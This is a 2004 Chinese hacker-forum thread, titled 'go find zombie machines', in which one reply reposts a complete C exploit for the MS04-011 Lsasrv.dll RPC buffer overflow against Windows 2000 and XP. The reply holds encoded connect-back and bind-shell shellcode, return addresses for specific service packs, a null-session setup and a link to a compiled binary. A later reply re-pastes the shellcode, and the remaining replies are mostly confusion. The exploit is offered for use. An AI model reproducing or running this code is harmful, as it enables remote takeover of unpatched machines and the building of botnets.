|
 | 作者: tabris17 [tabris17]
 论坛用户 |
登录 |
| ms04011 exploit for 2k & xp http://bbs.nsfocus.net/index.php?act=ST&f=3&t=161240&page=10#entry313253 [此贴被 四不象(tabris17) 在 04月27日12时37分 编辑过] |
| 地主 发表时间: 04-04-27 12:34 |
 | 回复: hcz [hcz]  论坛用户 |
登录 |
|
是新出来的吗 |
| B1层 发表时间: 04-04-27 13:10 |
 | 回复: feng5 [feng5]  |
登录 |
|
这是什么呀? |
| B2层 发表时间: 04-04-28 17:25 |
 | 回复: k_com [k_com] 论坛用户 |
登录 |
|
显示不到啊`~怎么回事 |
| B3层 发表时间: 04-04-29 16:43 |
| 回复: tabris17 [tabris17] 论坛用户 |
登录 |
|
主题 ms04011 exploit for 2k & xp sbaa 发表于:2004-04-24 22:20 发帖: 208 注册: 2000-10-27 Windows Lsasrv.dll RPC [ms04011] 这个漏洞分析 其实eeye写得很清楚了 只是攻击远程的方法eeye写得太复杂 ,mslug的办法很好 hack一个netapi32.dll,这样溢出代码就简单多了。 这个是个栈溢出,应该很好利用。在2k上溢出返回地址或seh都可以 不过一个有意思的地方是这个bug溢出两个地址间隔有800个字节,所以 可以先试ret再试seh 这样可以至少sp3,sp4一次搞定. 然后看xp eeye说xp只能用ascii 我看了果然是这样,而且问题是 溢出的串不能太长,好像哪里会截断。所以好像没办法覆盖到seh 只能覆盖ret,而覆盖了ret后jmp esp还需要再向前跳,这样才可以 运行shellcode. 但是2k如果不是unicode串,到不了溢出就返回了,所以如果要连xp一起 一次搞定就需要对xp用unicode的shellcode. 好像2k,xp判断容易所以这个实在搞不定也没关系了。 目前这个还不能被改成蠕虫 因为 1 带一个300k的dll 2 2k,xp不通用 可以靠抓包 和 做unicode的shellcode来解决 不过那个代码就要小心了 编译好的 http://sbaa.3322.org/public1/tool/ms04011.rar #include <windows.h> #pragma comment(lib,"mpr.lib") #pragma comment(lib, "ws2_32") /* from www.cnhonker.com */ unsigned char scode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99" "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12" "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99" "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9" "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D" "\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA" "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32" "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10" "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8" "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66" "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5" "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8" "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A" "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12" "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A" "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C" "\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33" "\xF9\x7E\xE0\x5F\xE0"; unsigned char scode2[] = "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A" "\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6" "\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D" "\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A" "\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58" "\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0" "\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41" "\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B" "\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D" "\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA" "\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10" "\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF" "\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8" "\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79" "\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C" "\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59" "\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD" "\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC" "\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5" "\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6" "\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0" "\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED" "\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99"; typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer; #define LEN 3500 char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char buf2[2]; char target2[200]; int main(int argc, char *argv[]) { HMODULE hNetapi; int ret=0; int i; char c, *target; LPSTR hostipc[40]; NETRESOURCE netResource; unsigned short port; unsigned long ip; unsigned char* sc; if (argc < 3) { printf("Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\n \ bug discoveried by eEye,\n \ code by sbaa(sysop@sbaa.3322.org) 2004/04/24 ver 0.1\n \ Usage: \n \ %s 0 targetip (Port ConnectBackIP ) \ ----> attack 2k (tested on cn sp4,en sp4)\n \ %s 1 targetip (Port ConnectBackIP ) \ ----> attack xp (tested on cn sp1)\n",argv[0],argv[0]); printf(""); return 0; } target = argv[2]; sprintf((char *)hostipc,"\\\\%s\\ipc$",target); netResource.lpLocalName = NULL; netResource.lpProvider = NULL; netResource.dwType = RESOURCETYPE_ANY; netResource.lpRemoteName=(char *)hostipc; ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session if (ret != 0) { printf("Create NULL session failed\n"); // return 1; } hNetapi = LoadLibrary("sbaaNetapi.dll"); if (!hNetapi) { printf("Can't load sbaaNetapi.dll.\n"); exit(0); } (DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer"); if (!DsRoleUpgradeDownlevelServer) { printf("Can't find function.\n"); exit(0); } memset(buf, '\x90', LEN); if(argc>4) { port = htons(atoi(argv[3]))^(USHORT)0x9999; ip = inet_addr(argv[4])^(ULONG)0x99999999; memcpy(&scode[118], &port, 2); memcpy(&scode[111], &ip, 4); sc=scode; } else { if(argc>3) { port = htons(atoi(argv[3]))^(USHORT)0x9999; memcpy(&scode2[176], &port, 2); } sc=scode2; } //attack all 2k sp3 version memcpy(&buf[2020], "\x95\x0c\x01\x78", 4); memcpy(&buf[2036], sc, strlen(sc)); //attack all 2k sp4 version memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4); memcpy(&buf[2844],"\x2b\x38\x03\x78",4); memcpy(&buf[2856], sc, strlen(sc)); printf("shellcode size %d\n", strlen(sc)); for(i=0; i<LEN; i++) { //unicode sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; if(atoi(argv[1])==1) { memcpy(&sendbuf, sc, strlen(sc)); memcpy(sendbuf+1964,"\xad\x14\x48\x74",4); memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16); memcpy(&sendbuf[1980], "\xeb\xde",2); } memset(target2, 0, 100); for(i=0; i<strlen(target); i++) { target2[i*2] = target[i]; target2[i*2+1] = 0; } memset(buf2, 0, 2); ret=0; ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]); printf("Ret value = %d\n",ret); WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE); FreeLibrary(hNetapi); return 0; } http://sbaa.3322.org/public1/tool/ms04011.rar |
| B4层 发表时间: 04-04-29 21:37 |
 | 回复: sf2163274 [sf2163274] 论坛用户 |
登录 |
|
晕 那真是要看死人啦 |
| B5层 发表时间: 04-05-01 19:22 |
| 回复: rinoe [rinoe]  论坛用户 |
登录 |
|
这个的意思是不是主要就是检查。dll文件是不是够的啊! |
| B6层 发表时间: 04-05-09 20:27 |
 | 回复: yinjun [yinjun]  论坛用户 |
登录 |
|
晕死 |
| B7层 发表时间: 04-05-09 22:27 |
 | 回复: jshazcb [jshazcb]  论坛用户 |
登录 |
|
是什么东西呀? |
| B8层 发表时间: 04-06-08 20:37 |
 | 回复: wish259 [wish259] 论坛用户 |
登录 |
|
编译好了在发出来啥 |
| B9层 发表时间: 04-06-09 14:57 |
 | 回复: snowred [snowred]  论坛用户 |
登录 |
|
我倒呀~~~ 这个也行呀! 不是说不要发布肉鸡的吗?! |
| B10层 发表时间: 04-06-19 11:25 |
 | 回复: chenji [chenji] 论坛用户 |
登录 |
|
学习中!!!!!!!!!!!!! |
| B11层 发表时间: 04-06-20 14:20 |
| 回复: sf2163274 [sf2163274] 论坛用户 |
登录 |
|
来点直接的啊 ! |
| B12层 发表时间: 04-06-27 08:43 |
 | 回复: wangsong [wangsong] 论坛用户 |
登录 |
|
什么时候 了 还拿这些东西 |
| B13层 发表时间: 04-06-28 16:47 |
 | 回复: lgf [lgf] 论坛用户 |
登录 |
|
看不懂 |
| B14层 发表时间: 04-06-28 16:56 |
| 回复: clark008 [clark008] 论坛用户 |
登录 |
|
什么呀? |
| B15层 发表时间: 04-06-29 18:08 |
 | 回复: wait [wait] 论坛用户 |
登录 |
|
真应该学习C语言!哈哈,我现在后悔了 |
| B16层 发表时间: 04-06-29 22:05 |
 | 回复: wangzhao1 [wangzhao1] 论坛用户 |
登录 |
|
看不懂啊我要学习了 |
| B17层 发表时间: 04-06-30 16:55 |
| 回复: skynet [skynet] 论坛用户 |
登录 |
|
晕.... |
| B18层 发表时间: 04-07-11 12:44 |
 | 回复: haounix [haounix] 论坛用户 |
登录 |
|
unsigned char scode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99" "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12" "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99" "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9" "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D" "\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA" "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32" "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10" "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8" "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66" "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5" "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8" "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A" "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12" "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A" "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C" "\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33" "\xF9\x7E\xE0\x5F\xE0"; 这断看不懂啊?  |
| B19层 发表时间: 04-07-11 18:28 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 大家去找肉鸡吧